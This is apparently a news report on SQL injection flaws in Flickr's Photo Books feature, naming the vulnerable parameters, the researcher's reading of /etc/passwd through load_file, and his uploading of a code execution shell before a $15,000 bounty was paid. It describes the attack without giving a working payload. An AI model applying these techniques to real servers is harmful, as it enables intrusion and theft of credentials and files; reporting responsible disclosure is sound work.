The recent discovery was made by Ibrahim Raafat, a security researcher from Egypt. He identified critical SQL injection vulnerabilities associated with the new Flickr Photo Books feature, which was introduced just five months ago for creating custom photo books.
His findings highlighted two parameters—page_id and items—that were susceptible to Blind SQL injection. Additionally, he found another parameter, order_id, vulnerable to Direct SQL Injection, allowing him to execute SQL SELECT statements against the Flickr database.
Exploiting these SQL vulnerabilities could have enabled an attacker to extract sensitive information, including the database and MySQL administrator passwords. The implications of such a breach could be severe, undermining user trust and data privacy.
Raafat’s investigation further revealed that the SQL injection flaws provided an opportunity for remote code execution on the server. Using the load_file(“/etc/passwd”) function, he accessed sensitive files hosted on the Flickr server, showcasing the extensive reach of the vulnerabilities. Furthermore, he leveraged this access to create and upload a custom code execution shell to the server.
Following his responsible disclosure of the vulnerabilities to Yahoo, prompt action was taken to patch the identified issues. In recognition of Raafat’s work, Yahoo awarded him a substantial bug bounty payout of $15,000, noting this as one of the largest rewards issued for reporting such vulnerabilities.
This incident highlights the importance of robust security measures and continuous vulnerability assessments for online platforms. The sophisticated nature of these exploits suggests possible use of MITRE ATT&CK tactics, including initial access through SQL injection, persistence via remote code execution, and privilege escalation opportunities due to inadequate security protocols. Business owners should be vigilant and proactive in reinforcing security frameworks to safeguard their platforms against similar risks.
As this case illustrates the evolving landscape of cybersecurity threats, it serves as a crucial reminder for organizations to remain vigilant and adopt comprehensive security strategies. By staying informed of recent vulnerabilities and implementing best practices, companies can better protect themselves against potential exploitation and data breaches.